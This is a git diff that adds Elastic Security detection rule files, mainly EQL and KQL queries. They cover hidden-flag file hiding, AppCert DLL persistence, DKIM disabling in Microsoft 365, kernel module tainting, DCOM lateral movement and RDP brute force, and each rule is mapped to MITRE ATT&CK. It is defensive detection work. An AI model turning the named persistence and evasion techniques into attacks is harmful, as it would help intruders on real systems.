b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_2.json new file mode 100644 index 00000000000..64ad90ebbe7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_2.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identify activity related where adversaries can add the 'hidden' flag to files to hide them from the user in an attempt to evade detection.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Hidden Files and Directories via Hidden Flag", + "query": "file where event.type == \"creation\" and process.name == \"chflags\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5124e65f-df97-4471-8dcb-8e3953b3ea97", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "5124e65f-df97-4471-8dcb-8e3953b3ea97_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_107.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_107.json new file mode 100644 index 00000000000..83e52543ef0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_107.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppCert DLL", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "513f0ffd-b317-4b9c-9494-92ce861f22c7_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_108.json b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_108.json new file mode 100644 index 00000000000..8dd69f650bb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/513f0ffd-b317-4b9c-9494-92ce861f22c7_108.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Registry Persistence via AppCert DLL", + "query": "registry where host.os.type == \"windows\" and\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.009", + "name": "AppCert DLLs", + "reference": "https://attack.mitre.org/techniques/T1546/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "513f0ffd-b317-4b9c-9494-92ce861f22c7_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_103.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_103.json new file mode 100644 index 00000000000..3f5e28f19aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_103.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", + "false_positives": [ + "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "514121ce-c7b6-474a-8237-68ff71672379_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_105.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_105.json new file mode 100644 index 00000000000..578fd0049ba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_105.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", + "false_positives": [ + "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "514121ce-c7b6-474a-8237-68ff71672379_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_206.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_206.json new file mode 100644 index 00000000000..40d06c3064e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_206.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed.", + "false_positives": [ + "Disabling a DKIM configuration may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "514121ce-c7b6-474a-8237-68ff71672379_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_2.json b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_2.json new file mode 100644 index 00000000000..afeae342851 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/51a09737-80f7-4551-a3be-dac8ef5d181a_2.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the syslog log file for messages related to instances of a out-of-tree kernel module load, indicating the taining of the kernel. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access.", + "from": "now-9m", + "index": [ + "logs-system.syslog-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Tainted Out-Of-Tree Kernel Module Load", + "query": "host.os.type:linux and event.dataset:\"system.syslog\" and process.name:kernel and \nmessage:\"loading out-of-tree module taints kernel.\"\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "51a09737-80f7-4551-a3be-dac8ef5d181a", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Filebeat\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat for the Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete Setup and Run Filebeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the Filebeat System Module to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 + }, + "id": "51a09737-80f7-4551-a3be-dac8ef5d181a_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107.json b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107.json new file mode 100644 index 00000000000..2aee1217d44 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107.json @@ -0,0 +1,155 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming DCOM Lateral Movement with MMC", + "query": "sequence by host.id with maxspan=1m\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mmc.exe\" and source.port >= 49152 and\n destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\"\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"mmc.exe\"\n ] by process.parent.entity_id\n", + "references": [ + "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "51ce96fb-9e52-4dad-b0ba-99b54440fc9a", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.003", + "name": "Distributed Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1021/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.014", + "name": "MMC", + "reference": "https://attack.mitre.org/techniques/T1218/014/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6.json new file mode 100644 index 00000000000..ff183541784 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux RDP Brute Force Attack Detected", + "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7.json new file mode 100644 index 00000000000..f3065e58c2b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a 